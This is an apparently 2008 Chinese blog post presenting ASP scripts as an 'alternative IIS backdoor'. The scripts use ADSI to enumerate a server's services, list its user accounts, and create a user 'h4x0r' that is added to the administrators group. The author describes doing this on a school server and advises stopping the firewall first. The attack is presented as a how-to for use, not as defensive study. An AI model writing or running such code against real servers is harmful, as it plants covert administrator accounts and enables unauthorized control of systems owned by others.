RSS订阅悠然探索,悠然索取
你的位置:首页 » 学习收藏 » 正文

IIS另类后门

选择字号: 超大 标准 发布时间:2008-10-25 15:9:59 | 作者:admin | 0个评论 | 人浏览

在以前版本的IIS中存在两个问题。第一,缺乏一个清晰的、开放的第三方管理产品的接口和一个定制的常规管理任务自动化的可编程接口;第二,需要一个控制目录服务以使网络上的服务器能够互相发现的机制。如果这些接口存在,站点创建者可以使用各种类型的工具来编写各种类型的服务器管理应用,比如除了用户管理和安全性产品外,他们还能创建用于性能管理、安装和配置的程序。于是Microsoft在1998年早些时候发布了一个活动目录服务接口(Active Directory ServiceInterfaces,ADSI)的新版本。ADSI和IIS管理对象(IIS Administration Object,IISAO)一起提供了一个用于控制目录服务和IIS自己的联合解决方案。
IISAO能够被使用许多不同语言编制的应用所访问,其中包括C++、Delphi、Java和VB。除了数量增长迅速外,第三方站点管理工具均可以通过ADSI和IISAO更好地挂接到IIS和目录服务中。另外,IISAO也可以经由一个服务器端的脚本引擎和活动服务器页面(Active Server Page,ASP)通过WEB页面被访问。事实上,如果正使用IIS 4.0以上管理工具的HTML版本,那么已经在使用IISAO。IISAO还能从使用Windows脚本主机(Windows Scripting Host,WSH)的命令行访问。
和IISAO一样,ADSI只是一组COM对象,能够在它们各自的目录服务中封装对象。这在本地目录服务和应用中创建了一个抽象层,因此,站点创建者可以通过一个单一的公共接口来控制许多不同的目录服务。利用这个功能强大的活动目录服务接口,我们能在Windows NT平台创建本地或远程主机管理员权限的完全访问,黑防以前关于脚本攻击的一些文章多少都带到了这方面的应用。
比如我们要看远程机器上开的服务(准备好Pskill,把防火墙先停了),代码如下:
<%Set ComputerObj = GetObject("WinNT://127.0.0.1")
ComputerObj.Filter = Array("Service")
For Each Service in ComputerObj
htm = htm& "Service display name = " & Service.DisplayName
htm = htm&("<BR>")
htm = htm& "Service account name = " & Service.ServiceAccountName
htm = htm&("<BR>")
htm = htm& "Service executable = " & Service.Path
Next%>
执行后返回结果.
怎么样?服务全部出来了吧?连服务对应的路径都有,比任务管理器还好用。“你好象还没把你刚才做的事情说清楚啊?”OK,其实学校服务器上的ASP程序的代码也很少,从添加账户到提升权限不过十几行:
<%
Set onlineServer= GetObject("WinNT://127.0.0.1")
Set newuser= onlineServer.Create("user","h4x0r")
NewUser.SetPassword "test2"
NewUser.FullName="Test2 test"
NewUser.Description="testuser"
NewUser.Setinfo
Set oDomain = GetObject("WinNT://" &"127.0.0.1")
Set oGroup = oDomain.GetObject("Group", "administrators")
oGroup.Add ("winnt://h4x0r")
htm = htm& "添加h4x0r用户成功"
htm = htm& "添加h4x0r管理员成功"
Set oDomain=Nothing
Set oGroup=Nothing
%>
看看效果吧。

查看当前机器所有帐户可以使用如下代码:
Set onlineServer= GetObject("WinNT://127.0.0.1")
onlineServer.filter=array("user")

for each member in onlineserver
htm = htm& member.name & "--" & member.FullName &"<br>"
next
Set onlineServer= GetObject("WinNT://127.0.0.1")
:  
 

标签:

猜你喜欢

发表评论

必填

选填

选填

必填,不填不让过哦,嘻嘻。

记住我,下次回复时不用重新输入个人信息

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。